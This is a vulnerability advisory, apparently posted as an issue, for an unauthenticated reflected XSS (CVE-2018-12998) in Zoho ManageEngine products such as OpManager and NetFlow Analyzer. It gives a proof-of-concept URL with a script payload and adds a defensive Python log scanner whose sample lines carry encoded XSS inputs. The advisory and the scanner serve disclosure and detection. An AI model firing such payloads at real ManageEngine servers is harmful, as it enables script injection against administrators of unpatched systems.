Open unh3x opened 6 years ago
================= Zoho ManageEngine XSS in multiple Products
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Affected Products:
- Netflow Analyzer
- Network Configuration Manager
- OpManager
- Oputils
- Opmanagerplus
- firewall analyzer
Exploit Author: xiaotian.wang From DBAppSecurity
CVE: CVE-2018-12998
================= Vulnerable cgi:
com.adventnet.me.opmanager.servlet.FailOverHelperServlet
================= Proof of Concept:
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111<script>alert(1)</script>
Notice: This vulnerability can be reproduced without login.
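
Added example, not part of the original report: a log check a defender could run to find requests to this servlet whose `operation` parameter carries markup, including percent-encoded and double-encoded forms. The combined access-log format and the sample lines (documentation-range IPs) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Servlet path and parameter name are taken from the report above.
SERVLET = "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that have no place in a value reflected into HTML.
MARKUP_RE = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_operation) for each flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if unquote(url.path) != SERVLET:
            continue
        # parse_qs decodes once; fully_decode handles further layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("operation", []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jun/2018:10:00:01 +0000] "GET ' + SERVLET +
    '?operation=11111111%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Jun/2018:10:00:05 +0000] "GET ' + SERVLET +
    '?operation=1%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 498',
    '203.0.113.4 - - [20/Jun/2018:10:00:09 +0000] "GET ' + SERVLET +
    '?operation=11111111 HTTP/1.1" 200 120',
    '203.0.113.4 - - [20/Jun/2018:10:00:12 +0000] "GET /index.html?operation=%3Cb%3E HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value))
```

Since the report notes the request works without login, the check cannot rely on a session or user field and matches on path and parameter alone.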